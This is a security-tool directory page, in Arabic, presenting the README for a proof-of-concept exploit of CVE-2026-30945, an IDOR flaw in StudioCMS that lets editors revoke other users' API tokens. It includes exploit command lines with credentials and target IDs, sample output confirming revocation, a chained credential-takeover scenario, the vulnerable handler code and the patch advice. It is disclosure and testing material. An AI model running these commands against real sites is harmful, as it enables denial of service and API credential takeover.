Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2026-30945-PoC — إثبات مفهوم لاستغلال CVE-2026-30945، وهو ثغرة IDOR في StudioCMS تسمح بإبطال عشوائي لرموز API وحرمان من الخدمة. يتضمن أوضاع اختبار يدوية وآلية. | Kitploit
أدوات/GitHubGitHub/filipegaudard/cve-2026-30945-poc
تحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويباختبار الاختراقالتعلم والتعليمأمن واجهات برمجة التطبيقات
GitHubfilipegaudard/cve-2026-30945-poc

CVE-2026-30945-PoC

إثبات مفهوم لاستغلال CVE-2026-30945، وهو ثغرة IDOR في StudioCMS تسمح بإبطال عشوائي لرموز API وحرمان من الخدمة. يتضمن أوضاع اختبار يدوية وآلية.

عرض المستودع
منذ 5 أشهرلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

🗑️ CVE-2026-30945

StudioCMS IDOR — إبطال تعسفي لرموز API يؤدي إلى رفض الخدمة

CVE CVSS CWE Type

NVD • Advisory • CWE-639


نظرة عامة

تسمح نقطة النهاية DELETE /studiocms_api/dashboard/api-tokens في StudioCMS ≤ 0.3.0 لأي مستخدم مُصادق يتمتع بصلاحيات editor أو أعلى بإبطال رموز API التي تخص أي مستخدم آخر، بما في ذلك حسابات admin و .

owner

يقبل المعالج tokenID و userID مباشرة من حمولة الطلب دون التحقق من ملكية الرمز أو هوية المتصل أو التسلسل الهرمي للأدوار. وهذا يتيح رفض خدمة موجهاً ضد التكاملات والأتمتة الحرجة.

ذو صلة: تشترك هذه الثغرة في نفس السبب الجذري مع CVE-2026-30944 (IDOR في توليد الرموز). عند دمجها معاً، يمكن للمهاجم إبطال الرموز الشرعية وتوليد رموز جديدة، محققاً استيلاءً كاملاً على بيانات اعتماد API.

تدفق الهجوم

root@kitploit:~
┌──────────────┐   DELETE /api-tokens        ┌──────────────┐
│              │  {"tokenID":"<id>",          │              │
│   Attacker   │   "userID":"<owner-id>"}     │  StudioCMS   │
│   (Editor)   │ ──────────────────────────► │   Server     │
│              │                              │              │
│              │ ◄────────────────────────── │              │
└──────────────┘  {"message":"Token deleted"} └──────────────┘
                                                     │
                                                     ▼
                                              ┌──────────────┐
                                              │  Owner's     │
                                              │  CI/CD       │
                                              │  Pipeline    │──► ❌ 401 Unauthorized
                                              │  Integration │──► ❌ API Access Lost
                                              │  Monitoring  │──► ❌ Silent Failure
                                              └──────────────┘

تفاصيل الثغرة

الحقلالقيمة
CVECVE-2026-30945
GHSAGHSA-8rgj-vrfr-6hqr
CVSS v3.17.1 (عالية) — AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:H
CWECWE-639: تجاوز التفويض عبر مفتاح يتحكم به المستخدم
CWE (ثانوي)CWE-863: تفويض غير صحيح
MITRE ATT&CKT1531 — إزالة وصول الحساب
OWASP APIAPI1:2023 — تفويض مكسور على مستوى الكائن
المتأثرstudiocms ≤ 0.3.0
تم الإصلاح فيstudiocms 0.4.0

المحتويات

الملفالوصف
cve_2026_30945_poc.pyسكربت استغلال بلغة Python مع أوضاع يدوية وآلية
README.mdهذا الملف
LICENSEرخصة MIT

المتطلبات الأساسية

  • StudioCMS ≤ 0.3.0 (إصدار ضعيف)
  • Python 3.8+
  • بيانات اعتماد صالحة لحساب Editor على الأقل
  • UUID معروف لسجل الرمز (المعرف الداخلي، وليس JWT)
root@kitploit:~
pip install requests colorama

بدء سريع

الاستغلال اليدوي

root@kitploit:~
# إبطال رمز محدد يخص المالك
python3 cve_2026_30945_poc.py \
  -u http://localhost:4321 \
  --username editor01 \
  --password editorpass \
  --target-uuid 2450bf33-0135-4142-80be-9854f9a5e9f1 \
  --token-id 16a2e549-513b-40ac-8ca3-858af6118afc

# الدمج مع CVE-2026-30944: إنشاء رمز للهدف أولاً
python3 cve_2026_30945_poc.py \
  -u http://localhost:4321 \
  --username editor01 \
  --password editorpass \
  --target-uuid 2450bf33-0135-4142-80be-9854f9a5e9f1

# حفظ النتائج في JSON
python3 cve_2026_30945_poc.py \
  -u http://localhost:4321 \
  --username editor01 \
  --password editorpass \
  --target-uuid 2450bf33-0135-4142-80be-9854f9a5e9f1 \
  --token-id 16a2e549-513b-40ac-8ca3-858af6118afc \
  --save

الاختبار الآلي

root@kitploit:~
# اختبار بأدوار متعددة
python3 cve_2026_30945_poc.py \
  -u http://localhost:4321 \
  --auto-test \
  --editor-user editor01 \
  --editor-pass editorpass \
  --visitor-user visitor01 \
  --visitor-pass visitorpass \
  --target-uuid 2450bf33-0135-4142-80be-9854f9a5e9f1 \
  --token-id 16a2e549-513b-40ac-8ca3-858af6118afc

الوسائط

إلزامية

الوسيطالوصف
-u, --urlعنوان URL الأساسي لـ StudioCMS المستهدف
--target-uuidUUID المستخدم المستهدف الذي سيتم إبطال رمزه

اختيارية

الوسيطالوصف
--token-idUUID سجل الرمز الداخلي المراد إبطاله (وليس JWT). إذا تم حذفه، سيحاول السكربت إنشاء رمز أولاً عبر CVE-2026-30944

الوضع اليدوي

الوسيطالوصف
--usernameاسم المستخدم للمصادقة
--passwordكلمة المرور للمصادقة

وضع الاختبار الآلي

الوسيطالوصف
--auto-testتفعيل الاختبار الآلي متعدد الأدوار
--editor-userاسم مستخدم حساب المحرر
--editor-passكلمة مرور حساب المحرر
--visitor-userاسم مستخدم حساب الزائر
--visitor-passكلمة مرور حساب الزائر

الأعلام

الوسيطالوصف
--saveحفظ النتائج في ملف JSON
--no-ssl-verifyتعطيل التحقق من شهادة SSL

مثال على المخرجات

نظام ضعيف

root@kitploit:~
  ──────────────────────────────────────────────────────────
  PHASE 1: Authentication
  ──────────────────────────────────────────────────────────
  [+] Authenticated as 'editor01'
  [*] Session user: editor01 (editor)
  [*] Session UUID: 39b3e7d3-5eb0-48e1-abdc-ce95a57b212c

  ──────────────────────────────────────────────────────────
  PHASE 3: Token Revocation (IDOR)
  ──────────────────────────────────────────────────────────
  [*] Target UUID: 2450bf33-0135-4142-80be-9854f9a5e9f1
  [*] Token ID:    16a2e549-513b-40ac-8ca3-858af6118afc
  [*] Revoking target's API token...
  [+] Token revoked! Server response: Token deleted
  [!] VULNERABILITY CONFIRMED — Token successfully revoked!
  [!] Target user's API integrations are now broken (DoS)

نظام مُصَلَّح

root@kitploit:~
  ──────────────────────────────────────────────────────────
  PHASE 3: Token Revocation (IDOR)
  ──────────────────────────────────────────────────────────
  [*] Target UUID: 2450bf33-0135-4142-80be-9854f9a5e9f1
  [*] Token ID:    16a2e549-513b-40ac-8ca3-858af6118afc
  [*] Revoking target's API token...
  [*] Access denied (403 Forbidden) — endpoint may be patched
  [-] Revocation failed: Access denied (403 Forbidden)

سلسلة الهجوم (CVE-2026-30944 + CVE-2026-30945)

عند دمجها مع IDOR في توليد الرموز (CVE-2026-30944)، يمكن للمهاجم تنفيذ استيلاء كامل على بيانات اعتماد API:

root@kitploit:~
Step 1: Revoke owner's legitimate token    (CVE-2026-30945)
   └──► Owner's CI/CD pipelines break silently

Step 2: Generate new token for owner       (CVE-2026-30944)
   └──► Attacker now has owner-level API access

Step 3: Owner creates a new token to fix
   └──► Attacker revokes it again (persistent DoS)

يخلق هذا سيناريو يحافظ فيه المهاجم على سيطرة دائمة على وصول API الخاص بالمالك، مع إبطال متكرر لأي رموز جديدة ينشئها المالك مع الحفاظ على وصوله غير الشرعي الخاص.


السبب الجذري

يقبل المعالج الضعيف في packages/studiocms/frontend/pages/studiocms_api/dashboard/api-tokens.ts (الأسطر 58–99) tokenID و userID من جسم الطلب ويمررهما مباشرة إلى دالة الحذف دون أي فحوصات تفويض:

root@kitploit:~
// [1] Only checks if caller is editor — not WHO they're deleting tokens for
const isAuthorized = ctx.locals.StudioCMS.security?.userPermissionLevel.isEditor;

// [2] Both values from request body — no validation against session
const jsonData = yield* readAPIContextJson<{
    tokenID: string;    // No ownership check
    userID: string;     // No identity check
}>(ctx);

// [3] Passed directly to destructive operation — IDOR
yield* sdk.REST_API.tokens.delete({ tokenId: jsonData.tokenID, userId: jsonData.userID });

يمتلك المعالج خمسة عيوب مميزة: بوابة صلاحيات غير كافية، عدم التحقق من ملكية الرمز، غياب فحص هوية المتصل، عدم فرض التسلسل الهرمي للأدوار، والتمرير المباشر للقيم التي يتحكم بها المستخدم إلى عملية تدميرية.


التأثير

  • رفض الخدمة — يمكن إبطال رموز API المستخدمة في خطوط CI/CD أو التكاملات الخارجية أو أنظمة المراقبة بصمت
  • تخريب انتقائي — يمكن للمحرر إبطال الرموز بدقة من مسؤولين أو مالكين محددين
  • لا يوجد مسار تدقيق — تتم معالجة الإبطال كعملية شرعية، مما يجعل الإسناد صعباً
  • رفض خدمة مستمر عند الدمج — مع CVE-2026-30944، يمكن للمهاجم إبطال أي رموز جديدة ينشئها الضحية بشكل متكرر

التخفيف

قم بتحديث StudioCMS إلى الإصدار 0.4.0 أو أحدث:

root@kitploit:~
npm install studiocms@latest

إخلاء المسؤولية القانوني

هذه الأداة مقدمة لأغراض تعليمية واختبارات أمنية مصرح بها فقط.

  • استخدمها فقط ضد الأنظمة التي تملكها أو لديك إذن كتابي صريح لاختبارها
  • الوصول غير المصرح به إلى أنظمة الكمبيوتر غير قانوني في معظم الولايات القضائية
  • لا يتحمل المؤلف أي مسؤولية عن إساءة استخدام هذه الأداة
  • اتبع دائماً ممارسات الإفصاح المسؤول

المراجع

  • CVE: CVE-2026-30945
  • Advisory: GHSA-8rgj-vrfr-6hqr
  • CVE ذو صلة: CVE-2026-30944 (IDOR في توليد الرموز)
  • CWE: CWE-639 — تجاوز التفويض عبر مفتاح يتحكم به المستخدم
  • OWASP: API1:2023 — تفويض مكسور على مستوى الكائن
  • MITRE ATT&CK: T1531 — إزالة وصول الحساب

المؤلف

Filipe Gaudard


الترخيص

تم إصدار هذا الـ PoC بموجب رخصة MIT لأغراض تعليمية. استخدمه بمسؤولية وأخلاقية.

تنزيل الأداة